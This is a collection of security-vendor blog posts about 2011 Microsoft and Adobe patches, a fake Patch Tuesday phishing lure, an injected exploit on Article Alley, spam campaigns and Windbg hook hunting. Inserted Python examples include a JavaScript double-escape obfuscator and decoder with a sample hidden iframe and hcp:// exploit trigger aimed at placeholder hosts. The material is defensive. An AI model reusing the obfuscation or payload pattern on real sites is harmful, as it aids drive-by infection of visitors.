Microsoft patches 15 important vulnerabilities
Posted: 15 Sep 2011 02:45 PM

This month Microsoft issued five security bulletins covering 15 vulnerabilities in Excel, Office, SharePoint and Windows. All five are rated Important rather than Critical, and none of the vulnerabilities was known to be exploited in the wild when the patches shipped. Adobe also released a bulletin fixing 13 vulnerabilities in Adobe Reader and Acrobat. Websense® Security Labs strongly recommends applying all of these updates before criminals start using the holes for their own purposes.

 

Arguably the most important bulletin is MS11-072, which fixes five vulnerabilities in Microsoft Excel. Any of them could be used to execute arbitrary code with the access rights of the logged-on user, which is all an attacker needs once the user opens a crafted spreadsheet received by e-mail or downloaded from the Web. Office file-format bugs deserve attention because attackers are constantly looking for new ways to deliver malware, and Office documents are a natural carrier. They are probably getting more headlines now because Adobe's Reader sandbox and regular security patches seem to be paying off: an up-to-date system is much less likely to be compromised by a malicious PDF.

 

This does not mean, of course, that we will see no more vulnerabilities in Adobe Reader. On the same Tuesday Adobe issued its own security bulletin fixing 13 vulnerabilities. Each of them could allow an attacker to execute code on the host computer and take full control of it. The update is rated Critical, so applying it promptly is strongly recommended.

Also worth mentioning: after the DigiNotar breach, vendors have been removing the DigiNotar root certificates from their trust stores. Microsoft, Adobe and Mozilla have all shipped updates that do so, and Mozilla released an additional Firefox security update for this issue. Check that you have applied the latest updates; until you do, certificates fraudulently issued under the DigiNotar roots are still trusted by your systems.

 

Is your organization using the latest Firefox 6 or Internet Explorer 9? Which one did you find more secure? Give us your thoughts in the comments.

 

Vulnerabilities patched by Microsoft on 13 September 2011:

MS11-070 WINS Local Elevation of Privilege Vulnerability (CVE-2011-1984)

MS11-071 Windows Components Insecure Library Loading Vulnerability (CVE-2011-1991)

MS11-072 Excel Use after Free WriteAV Vulnerability (CVE-2011-1986)

MS11-072 Excel Out of Bounds Array Indexing Vulnerability (CVE-2011-1987)

MS11-072 Excel Heap Corruption Vulnerability (CVE-2011-1988)

MS11-072 Excel Conditional Expression Parsing Vulnerability (CVE-2011-1989)

MS11-072 Excel Out of Bounds Array Indexing Vulnerability (CVE-2011-1990)

MS11-073 Office Component Insecure Library Loading Vulnerability (CVE-2011-1980)

MS11-073 Office Uninitialized Object Pointer Vulnerability (CVE-2011-1982)

MS11-074 XSS in SharePoint Calendar Vulnerability (CVE-2011-0653)

MS11-074 HTML Sanitization Vulnerability (CVE-2011-1252)

MS11-074 Editform Script Injection Vulnerability (CVE-2011-1890)

MS11-074 Contact Details Reflected XSS Vulnerability (CVE-2011-1891)

MS11-074 SharePoint Remote File Disclosure Vulnerability (CVE-2011-1892)

MS11-074 SharePoint XSS Vulnerability (CVE-2011-1893)

 

Vulnerabilities patched by Adobe on 13 September 2011:

Local privilege-escalation vulnerability (Adobe Reader X (10.x) on Windows only) (CVE-2011-1353).

Security bypass vulnerability that could lead to code execution (CVE-2011-2431).

Buffer overflow vulnerability in the U3D TIFF Resource that could lead to code execution (CVE-2011-2432).

Heap overflow vulnerability that could lead to code execution (CVE-2011-2433).

Heap overflow vulnerability that could lead to code execution (CVE-2011-2434).

Buffer overflow vulnerability that could lead to code execution (CVE-2011-2435).

Heap overflow vulnerability in the Adobe image parsing library that could lead to code execution (CVE-2011-2436).

Heap overflow vulnerability that could lead to code execution (CVE-2011-2437).

Stack overflow vulnerabilities in the Adobe image parsing library that could lead to code execution (CVE-2011-2438).

Memory leakage condition vulnerability that could lead to code execution (CVE-2011-2439).

Use-after-free vulnerability that could lead to code execution (CVE-2011-2440).

Stack overflow vulnerabilities in the CoolType.dll library that could lead to code execution (CVE-2011-2441).

Logic error vulnerability that could lead to code execution (CVE-2011-2442).

 

Websense Security Labs and our ThreatSeeker Network are constantly monitoring for these threats occurring in the wild.

 

Administrators and users beware - Fake Patch Tuesday Alert!
Posted: 09 May 2011 04:07 PM

The Websense Security Labs ThreatSeeker® Network has noticed a low-volume e-mail threat posing as a Microsoft update, with very low anti-virus detection. Its timing coincides almost perfectly with the upcoming "Patch Tuesday" release from Microsoft. The message lures the unsuspecting user into following a link, which downloads a malicious executable (the fake patch) to the user's machine. The executable is hosted on a compromised domain and, at the time of writing, is detected by only 11% of the engines on VirusTotal. Remember that Microsoft does not distribute security updates by e-mail or through links in e-mail: updates arrive only through Windows Update, Microsoft Update, WSUS or the Microsoft Download Center, so any message asking you to click a link to install a patch is a lure.

 

Websense customers are protected by our Advanced Classification Engine - ACE.

 

The message looks quite legitimate: the display name in the From header claims it originates from Microsoft Canada (the header is spoofed). It creates a sense of urgency with the subject "URGENT: Critical Security Update", and the body is presented in two languages, English and French, which shows some effort went into the lure and widens the target audience. Installing the fake patch infects the machine with a Zeus Trojan variant that calls home to its command and control server at visitortracker.net.in.


Below are the headers and body of the message.

As a heads-up on what to expect this "Patch Tuesday": it is a small release. Microsoft will ship only two bulletins fixing two as-yet-undisclosed vulnerabilities, a Critical one affecting Windows and an Important one affecting Office.
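The traits described above (a display name claiming Microsoft while the sending address is elsewhere, urgency wording in the subject, and a link to an executable on a third-party host) are easy to check mechanically at the mail gateway. The following Python script is an added example, not code from Websense or from the original post. It runs those checks over two constructed sample messages whose addresses and hosts are placeholders, and it treats only microsoft.com as a legitimate sender domain, which is an assumption made for the example.

```python
"""Triage heuristics for a 'fake Patch Tuesday' lure (added example).

Flags: a From display name that claims Microsoft while the address is not on
a Microsoft domain; urgency wording in the subject; and links to Windows
executables hosted outside Microsoft domains. The sample messages are
constructed for this example and every host in them is a placeholder.
"""
import email
import email.utils
import re
from email import policy
from urllib.parse import urlparse

# Assumption for the example: these are the only sender domains we trust.
TRUSTED_DOMAINS = ("microsoft.com",)
URGENCY_RE = re.compile(r"\b(urgent|critical|immediately|action required)\b", re.I)
URL_RE = re.compile(r"https?://[^\s<>\"']+", re.I)
EXECUTABLE_EXT = (".exe", ".msi", ".scr", ".com", ".bat", ".cmd", ".pif")

# Constructed lure modelled on the one described in the post: bilingual body,
# spoofed display name, urgent subject, link to a .exe on a compromised host.
LURE_EMAIL = b"""From: "Microsoft Canada" <security-update@mailer.example.test>
To: admin@example.org
Subject: URGENT: Critical Security Update
Content-Type: text/plain; charset=utf-8

A critical security update is available. Install it immediately:
http://compromised-host.test/updates/KB2011-05-patch.exe

Une mise a jour critique est disponible. Installez-la immediatement :
http://compromised-host.test/updates/KB2011-05-patch.exe
"""

# Constructed benign message for comparison.
BENIGN_EMAIL = b"""From: "Microsoft Security Notification" <securitynotifications@microsoft.com>
To: admin@example.org
Subject: Microsoft Security Bulletin Summary for May 2011
Content-Type: text/plain; charset=utf-8

Details are at https://www.microsoft.com/technet/security/bulletin/ms11-may.mspx
"""


def is_trusted(host):
    """True when host is one of TRUSTED_DOMAINS or a subdomain of one."""
    host = (host or "").lower()
    return any(host == d or host.endswith("." + d) for d in TRUSTED_DOMAINS)


def triage(raw):
    """Return the list of suspicious findings for one raw RFC 5322 message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    name, addr = email.utils.parseaddr(str(msg["From"] or ""))
    sender_host = addr.rpartition("@")[2]
    body = msg.get_body(preferencelist=("plain", "html")).get_content()

    findings = []
    if "microsoft" in name.lower() and not is_trusted(sender_host):
        findings.append(f"display name claims Microsoft, sender domain is {sender_host}")
    if URGENCY_RE.search(msg["Subject"] or ""):
        findings.append("urgency wording in subject")
    for url in sorted(set(URL_RE.findall(body))):
        parsed = urlparse(url)
        if parsed.path.lower().endswith(EXECUTABLE_EXT) and not is_trusted(parsed.hostname):
            findings.append(f"link to executable on third-party host {parsed.hostname}")
    return findings


def verdict(raw):
    """'suspicious' when two or more independent traits match, else 'clean'."""
    return "suspicious" if len(triage(raw)) >= 2 else "clean"


if __name__ == "__main__":
    for label, raw in (("lure", LURE_EMAIL), ("benign", BENIGN_EMAIL)):
        print(label, verdict(raw), triage(raw))
```

The two-trait threshold in verdict() is deliberate: a genuine Microsoft notification can legitimately use the word "critical", and a newsletter can link to a download, but a Microsoft-branded display name on a non-Microsoft address combined with either of those is the pattern this lure shows.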

 

 

 

 

 

 

Anonymous

MS Tuesday - February 2011
Posted: 09 Feb 2011 11:47 AM

System administrators and security experts focus on Patch Tuesday every month (also known as Microsoft Black Tuesday or MS Tuesday). This time Microsoft patched many important vulnerabilities, but has it fixed all the currently known zero-days? Let's find out.

 

On February 8th Microsoft released 12 security bulletins fixing various vulnerabilities, three of them rated Critical. Possibly the most important are the recently disclosed 0-day in the Windows Graphics Rendering Engine (GRE) and the 0-day in Internet Explorer's Cascading Style Sheet (CSS) handling. The software giant also fixed a critical vulnerability in its OpenType Compact Font Format (CFF) driver.

 

A further nine bulletins rated Important were also included in this update, so it is highly recommended that users update all servers and workstations to avoid becoming victims of online crime.

Some of the vulnerabilities in this Patch Tuesday can be exploited remotely, while others need local access to the computer. Remote exploits are the more dangerous class because the attacker never needs to touch the machine: a drive-by from a compromised Web site is enough. The Websense ThreatSeeker Network detects thousands of compromised Web sites every day, each redirecting visitors to a malicious site that exploits unpatched vulnerabilities and gains full access to the unaware user's computer. Websense Security Gateway and Websense Hosted Services protect customers against this type of attack; even so, keeping servers and workstations up to date remains essential.

 

The bulletins and vulnerabilities in detail:  

 

Three critical vulnerabilities have been patched:

 

  • MS11-003: Cumulative security update for Internet Explorer fixing four vulnerabilities. Any of them could allow an attacker to run arbitrary code on the computer, without the user's consent, while the user browses a malicious or compromised Web site.

 

  • MS11-006: Fixes a publicly disclosed critical vulnerability in the Graphics Rendering Engine (GRE) in many Windows versions, including Windows XP, Windows Server and Vista. It could allow an attacker to execute arbitrary code when the user views a specially crafted thumbnail image, for example in a network share or a document. See our earlier blog post for further details. The following vulnerability has been patched:
    • CVE-2010-3970 - Windows Shell Graphics Processing Overrun Vulnerability (0-day)

 

  • MS11-007: Security update for a privately reported vulnerability in the OpenType Compact Font Format (CFF) driver, affecting Windows versions including Windows XP, Windows Server and Windows 7. It could allow an attacker to execute arbitrary code when the user views content that includes a specially crafted OpenType font, for example a Web page or document embedding the font.

 

Nine non-critical, but important security patches:

 

  • MS11-004: Patches a vulnerability in the Microsoft Internet Information Services (IIS) FTP Service that could allow an attacker to execute code on the FTP server by sending a malicious FTP command. Because the FTP Service is not installed by default on IIS, the update is rated Important rather than Critical. The following vulnerability has been patched:
    • CVE-2010-3972 - IIS FTP Service Heap Buffer Overrun Vulnerability (0-day)

 

  • MS11-005: Security update for a vulnerability in Active Directory that could allow a cyber criminal to cause a Denial of Service on an Active Directory server. The attacker first needs local administrator privileges on a computer joined to the domain, which is why the bulletin is rated Important rather than Critical.

 

  • MS11-008: Resolves two privately reported vulnerabilities in Microsoft Visio. Either could allow an attacker to execute arbitrary code on the computer when the user opens a specially crafted Visio file.

 

  • MS11-009: Fixes a privately reported vulnerability in the JScript and VBScript scripting engines that could allow an attacker to gather information from the user's computer when the user visits a malicious Web site. A typical trick to get a user to such a site is a spam or phishing e-mail containing the link. The following vulnerability has been patched:
    • CVE-2011-0031 - Scripting Engines Information Disclosure Vulnerability

 

  • MS11-010: Another privately reported vulnerability, this one in the Windows Client/Server Run-time Subsystem (CSRSS) on Windows XP and Windows Server 2003. It could allow a local Elevation of Privilege: an attacker who can log on to the computer could capture sensitive logon information from other users as they log on and off, and thereby gain their privileges, including the administrator's. The following vulnerability has been patched:
    • CVE-2011-0030 - CSRSS Elevation of Privilege Vulnerability

 

  • MS11-011: This update corrects two vulnerabilities in the Windows kernel. Both could allow a local Elevation of Privilege attack by running a specially crafted application on the computer. The following vulnerabilities have been patched:
    • CVE-2010-4398 - Driver Improper Interaction with Windows Kernel Vulnerability
    • CVE-2011-0045 - Windows Kernel Integer Truncation Vulnerability

 

  • MS11-012: This bulletin fixes five Elevation of Privilege vulnerabilities in the Win32k kernel-mode driver, through which an attacker could gain the privileges of other users, including the administrator. The attacker needs to be able to log on to the computer and run a specially crafted application. The following vulnerabilities have been patched:
    • CVE-2011-0086 - Win32k Improper User Input Validation Vulnerability
    • CVE-2011-0087 - Win32k Insufficient User Input Validation Vulnerability
    • CVE-2011-0088 - Win32k Window Class Pointer Confusion Vulnerability
    • CVE-2011-0089 - Win32k Window Class Improper Pointer Validation Vulnerability
    • CVE-2011-0090 - Win32k Memory Corruption Vulnerability

 

  • MS11-013: This bulletin patches Windows Kerberos. The vulnerabilities could allow an attacker to forge service tickets and gain the privileges of other users, including the administrator; however, the attacker first needs to join their domain and must hold administrator privileges on that domain, which is why the rating is not Critical.

 

  • MS11-014: This privately reported vulnerability is yet another Elevation of Privilege, this time in the Local Security Authority Subsystem Service (LSASS) on Windows XP and Windows Server 2003. It is exploited locally by running a specially crafted application on the computer, so the attacker first needs valid credentials to log on and run applications.

 

As in several previous MS Tuesday rounds, this is a very important patch set: it contains many Critical and high-severity fixes, several of them for vulnerabilities being actively exploited in ongoing attacks. Websense Security Labs therefore highly recommends applying the patches as soon as you can to improve your resistance to these kinds of attacks.

 

Tamas Rudnai

Article Alley compromised
Posted: 05 Jul 2010 12:44 AM

Websense Security Labs™ ThreatSeeker™ Network has detected that Articlealley.com has been compromised: obfuscated malicious code has been injected into its pages.

 

Article Alley is a free article directory that aims to help authors promote and syndicate their content. It allows authors and promoters to get their articles out on the Web with the potential of being read by millions of readers. The injection was made at the root of the domain, so every page on the site served the malicious code.

 

Screenshot of the infected site:

Screenshot of injected code:

Following the redirection chain after the first layer of de-obfuscation leads to the final landing page, which is itself heavily obfuscated.

At first glance the malicious code looks extensive and complex, but the encoding is simple. First, replace every occurrence of the filler string 'SS KWKW o' in the two long variables with '%'. Then decode the two variables by running JavaScript's unescape() on them twice: the payload was escaped twice before the '%' signs were hidden, so a single pass only peels off the outer layer.

Snapshot of the decrypted code:

The decoded code targets the Microsoft Help and Support Center 0-day vulnerability CVE-2010-1885, a flaw in the hcp:// protocol handler.
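To make the decoding procedure above reproducible, here is a Python version of it, added as an example for this post; it is not the injected script itself, which appears above only as a screenshot. The obfuscation scheme is the one the post describes (escape twice, then hide every '%' behind the filler string), so the example includes a constructed encoder to build a sample blob from a made-up payload, decodes it the way the post does, and finally pulls out the two indicators an analyst would want from the decoded page: iframe sources and hcp:// URLs of the kind CVE-2010-1885 is triggered through. All URLs in the sample are placeholders.

```python
"""De-obfuscating the Article Alley style injection (added example).

Scheme from the post: the injected variables are JavaScript escape()d twice
and every '%' is then replaced by a filler token. Decoding reverses that.
The payload below is constructed for the example; its URLs are placeholders.
"""
import re

TOKEN = "SS KWKW o"  # filler string that stands in for '%' in the injected code

# JavaScript escape()/unescape(): A-Za-z0-9@*_+-./ pass through, other code
# points below 256 become %XX and the rest become %uXXXX.
_SAFE = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789@*_+-./")


def js_escape(s):
    out = []
    for ch in s:
        cp = ord(ch)
        if ch in _SAFE:
            out.append(ch)
        elif cp < 256:
            out.append("%%%02X" % cp)
        else:
            out.append("%%u%04X" % cp)
    return "".join(out)


def js_unescape(s):
    # One pass only, like the JavaScript built-in: '%25' becomes '%' and is
    # not re-decoded, which is why the post needs two rounds.
    return re.sub(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})",
                  lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def obfuscate(payload):
    """Constructed encoder: what the attacker did to the payload."""
    return js_escape(js_escape(payload)).replace("%", TOKEN)


def layers(blob):
    """Each stage of the decoding: '%' restored, first unescape, second unescape."""
    restored = blob.replace(TOKEN, "%")
    first = js_unescape(restored)
    return [restored, first, js_unescape(first)]


def deobfuscate(blob):
    """What the post describes: restore '%' and unescape twice."""
    return layers(blob)[2]


def indicators(script):
    """Pull iframe sources and hcp:// URLs out of decoded script text."""
    return {
        "iframes": re.findall(r'<iframe[^>]*src="([^"]+)"', script, re.I),
        "hcp_urls": re.findall(r'hcp://[^"\'\s<]+', script, re.I),
    }


# Constructed payload modelled on the attack: a hidden iframe to a redirector
# plus a hcp:// navigation, the handler abused by CVE-2010-1885.
PAYLOAD = ('<iframe src="http://redirector.example.test/in.php?id=1" width=1 height=1 '
           'style="visibility:hidden"></iframe>'
           '<script>document.location="hcp://services/search?query=example";</script>')
OBFUSCATED = obfuscate(PAYLOAD)

if __name__ == "__main__":
    for i, stage in enumerate(layers(OBFUSCATED)):
        print(f"stage {i}: {stage[:60]}...")
    print(indicators(deobfuscate(OBFUSCATED)))
```

Running it shows that after the first unescape() the text is still full of '%XX' sequences, and only the second pass yields readable HTML, which is exactly the two-round behaviour described above.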

 

At the time of publishing this blog, the site has been cleaned and the malicious code removed.

 

 Websense Messaging and Websense Web Security customers are protected against this attack.

 

Spam Summary of Last Weekend
Posted: 07 Jun 2010 07:00 AM

Websense® Security Labs™ ThreatSeeker™ Network was busy last weekend, detecting three spam campaigns totalling millions of e-mails.

 

Confirm Twitter password, and Twitter security model setup

 

These are variants of the "Reset Your Twitter Password" spam we blogged about last week. The campaign continued and grew in scale from 55,000 to 170,000 messages. We have seen quite a few different subjects; the two below are the most frequent.

Facebook account deactivated, or invited by somebody famous?

Over 144,000 of these spam e-mails have been caught by our Hosted Email Security system. When a user visits the fake Facebook link in the e-mail, the system is attacked by the Eleonore Exploit Kit and, if the exploit succeeds, turned into a bot.

Outlook Setup Notification

 

At the time of writing, over 106,000 instances of this campaign have been caught by our system, and the number is still rising.

The statistics below show that spam volume was on average 15,700 messages per day higher over the weekend than on weekdays. Some spammers clearly did not take a break.

Websense Messaging and Websense Web Security customers are protected against these attacks.

 

Analyzing Malware Using Microsoft Tools
Posted: 29 Apr 2010 01:04 PM

Reverse engineering of malware has been with us for a while. Some time ago you needed magic tools from underground hackers, but the situation has changed a lot since then. This is especially true on the Windows platform, where Microsoft itself ships a lot of good tools. They were not made for reverse engineering, but they are very helpful for analyzing binaries, and they are very stable because they go through extensive internal quality assurance before being released to the public.

These Microsoft-made tools seem to be underestimated. Many hackers use OllyDbg instead of Windbg, many people use third-party dumping tools instead of userdump, and so on. It's not that OllyDbg or the other tools aren't good; I just want to show how easily the same things can be done with the tools released by Microsoft. I'll show two of them: dumping processes, and finding rootkit components embedded in process images. Both take just a few lines of commands.

The situation is as follows. We have a machine infected with malware, a Zbot variant. We know the malware injects code into other processes to intercept and control the data flowing through the system, so we decide to dump the process image. How can this be done with Microsoft tools? Just download and install User Mode Process Dumper version 8.1 on the target system. Here is an example that dumps the image of the infected "svchost.exe" process.

Illustration 1: Using userdump to dump live process images

You just call userdump.exe with the target process name and a dump file name. It goes through every process with that name and writes each image to a file named as you specified plus the process ID, so a single invocation grabs dumps of every process sharing that name. Convenient, right? Another benefit of userdump is that it does not terminate the process it dumps, so the process carries on as before: we can silently duplicate the process image and let the system run without intervention.

So now we have the corpse images of the processes, and it's time to do some basic autopsy work to see which organs have been tweaked by this botnet client. First you need Debugging Tools for Windows (aka Windbg). There are, however, some issues with the Windbg download: the last release of the standalone package dates from March 2009, more than a year ago, and to get the latest Windbg you now need to download and install the WDK. In my case the March 2009 release was fine, and the examples here work without any problem with the standalone package.

Just move all the dmp files acquired from userdump to a safe location. Launch Windbg and select File > Open Crash Dump. Then choose the dump file you want to analyze.

If you come from the OllyDbg world, the first thing you'll notice is the UI: Windbg doesn't have a fancy GUI like OllyDbg, and you need to know the debugging commands to achieve anything, even simple things. This can be a big hurdle for people accustomed to full-blown GUI debuggers, but the command-line approach has advantages. You can copy and paste commands easily, save all the output to a text file for later review, and keep the log of everything you did inside the debugger as your record. Windbg also supports a limited scripting facility (the "Debugger Command Program"), which makes life easier when you are performing simple, tedious, repetitive tasks.

We will use a small piece of this scripting support to find the hooks installed in the target process. The following one-liner reveals inline hooks, that is, code bytes in a loaded module that have been patched in memory:

!for_each_module !chkimg @#ModuleName -d

!for_each_module is an extension command (every command that starts with "!" is an extension). It runs the command that follows it once for every module loaded in the target process.

The command run for each module is "!chkimg @#ModuleName -d". !chkimg compares a module's image in memory against the pristine copy obtained through the symbol path (the symbol store or the on-disk executable) and reports every byte that differs; the -d switch displays the mismatched ranges. @#ModuleName is replaced with the name of the module currently being processed. For Windows system DLLs the reference copy comes from the Microsoft symbol store, so if you don't have a symbol path configured, run the following from inside the Windbg command prompt:

.sympath+ SRV*C:\localsymbols*http://msdl.microsoft.com/download/symbols

"C:\localsymbols" can be replaced with any local directory that you want to use for symbol cache files.

Here is the result of "!for_each_module" combined with "!chkimg". It iterates through all the modules loaded in the process, checks each executable image against the copy from the Microsoft symbol store, and reports any discrepancy. One caveat: it can only check modules whose image file it can locate through the symbol path, so third-party DLLs without a reference copy need a different approach.

Illustration 2: The section inside the red square shows the APIs where the malicious hook is installed

From the picture above you can see that many APIs in ws2_32.dll (Winsock) and wininet.dll have been modified. It is immediately clear that the malware monitors and modifies network traffic by hooking the network-related APIs, which is what a Zbot-style banking Trojan needs in order to capture credentials from the data the process sends.

For example, let's look at the WSASend API in ws2_32.dll. The "u" command disassembles any region of memory; disassembling WSASend shows that its first instruction is a jmp to 0x00b7dbbd, an address outside the DLL's own image.

Illustration 3: ws2_32!WSASend inline hook installed

Disassembling memory at that address, again with "u", shows the hook function that the jmp lands in.

Illustration 4: Hook function

Examining the memory region containing 0x00b7dbbd with the "!address" extension command shows that its protection is PAGE_EXECUTE_READWRITE. Code belonging to a normally loaded module is PAGE_EXECUTE_READ; executable memory that is also writable, and not backed by any mapped image, is a strong sign of injected code. This is most likely a private (heap-like) allocation into which the hook module was injected from another process.

Illustration 5: Memory property of region containing the hook function.
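To make the three Windbg steps above concrete, here is a Python model of what they compute, written for this post as an added example rather than code from the article or from Microsoft's tools: a byte-for-byte diff of a module's in-memory code against its pristine copy (what !chkimg reports), decoding of the E9 rel32 jmp that overwrites a hooked function's prologue (what "u" showed at ws2_32!WSASend), and a lookup of the protection and type of the region the jmp lands in (what !address showed). The module base, export RVAs, code bytes and region map are all constructed for the example; only the hook pattern and the 0x00b7dbbd target come from the article.

```python
"""Model of the hook-hunting workflow from the post (added example).

Constructed data stands in for the real dump: a tiny 'ws2_32' code section,
its export RVAs, a hooked copy of it, and a region map like !address prints.
"""
import struct

MODULE_BASE = 0x71A00000                    # constructed load address
MODULE_SIZE = 0x100
EXPORTS = {"WSASend": 0x10, "WSARecv": 0x40, "send": 0x70}   # constructed RVAs
PROLOGUE = bytes.fromhex("8bff558bec")      # mov edi,edi; push ebp; mov ebp,esp
HOOK_TARGET = 0x00B7DBBD                    # the jmp target seen in the post

# Pristine image as the symbol server / on-disk file would have it.
CLEAN = bytearray(MODULE_SIZE)
for rva in EXPORTS.values():
    CLEAN[rva:rva + len(PROLOGUE)] = PROLOGUE


def install_inline_hook(image, base, rva, target):
    """What the malware does: overwrite the prologue with 'jmp rel32' to target."""
    rel = (target - (base + rva + 5)) & 0xFFFFFFFF
    hooked = bytearray(image)
    hooked[rva:rva + 5] = b"\xE9" + struct.pack("<I", rel)
    return hooked


MEMORY = install_inline_hook(CLEAN, MODULE_BASE, EXPORTS["WSASend"], HOOK_TARGET)

# Constructed region map: (start, end, protection, type), as !address lists it.
REGIONS = [
    (0x00B70000, 0x00B90000, "PAGE_EXECUTE_READWRITE", "MEM_PRIVATE"),
    (MODULE_BASE, MODULE_BASE + MODULE_SIZE, "PAGE_EXECUTE_READ", "MEM_IMAGE"),
]


def chkimg(clean, memory):
    """Byte ranges [(rva_start, rva_end)) where memory differs from the clean image."""
    ranges, start = [], None
    for i, (a, b) in enumerate(zip(clean, memory)):
        if a != b and start is None:
            start = i
        elif a == b and start is not None:
            ranges.append((start, i))
            start = None
    if start is not None:
        ranges.append((start, len(clean)))
    return ranges


def symbol_for(rva):
    """Nearest preceding export, formatted like a debugger symbol (name+0xoff)."""
    name, sym = max(((n, r) for n, r in EXPORTS.items() if r <= rva),
                    key=lambda nr: nr[1], default=("<module>", 0))
    return f"{name}+0x{rva - sym:x}"


def decode_jmp(memory, base, rva):
    """If memory[rva] is E9 (jmp rel32), return its absolute target, else None."""
    if memory[rva] != 0xE9:
        return None
    rel = struct.unpack("<i", bytes(memory[rva + 1:rva + 5]))[0]
    return (base + rva + 5 + rel) & 0xFFFFFFFF


def region_of(addr):
    for start, end, prot, kind in REGIONS:
        if start <= addr < end:
            return prot, kind
    return None


def find_hooks(clean, memory, base):
    """Combine the three steps: diff, decode the jmp, classify the landing region."""
    hooks = []
    for start, end in chkimg(clean, memory):
        target = decode_jmp(memory, base, start)
        region = region_of(target) if target is not None else None
        hooks.append({
            "symbol": symbol_for(start),
            "patched_bytes": end - start,
            "jmp_target": target,
            "target_region": region,
            # Code that jumps out of a mapped image into writable private
            # memory is the inline-hook signature the post describes.
            "suspicious": region is not None and region[1] != "MEM_IMAGE",
        })
    return hooks


if __name__ == "__main__":
    for h in find_hooks(CLEAN, MEMORY, MODULE_BASE):
        print(f"ws2_32!{h['symbol']}: {h['patched_bytes']} bytes patched, "
              f"jmp -> {h['jmp_target']:#010x} {h['target_region']} suspicious={h['suspicious']}")
```

The same diff-then-follow logic is what you apply by hand in the debugger: a mismatch range reported by !chkimg at a function's first bytes, a jmp decoded by "u", and a landing region that !address reports as private and writable.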


That's it for today. We have shown how to dump processes with a single command and how to use Windbg to find hooks or rootkit components installed in a process. The next step is to analyze the hook functions themselves; a future post will cover that using IDA, IDAPython and the command-line version of Windbg.

Thanks, and happy reversing!

 

©2013 Websense, Inc. All Rights Reserved.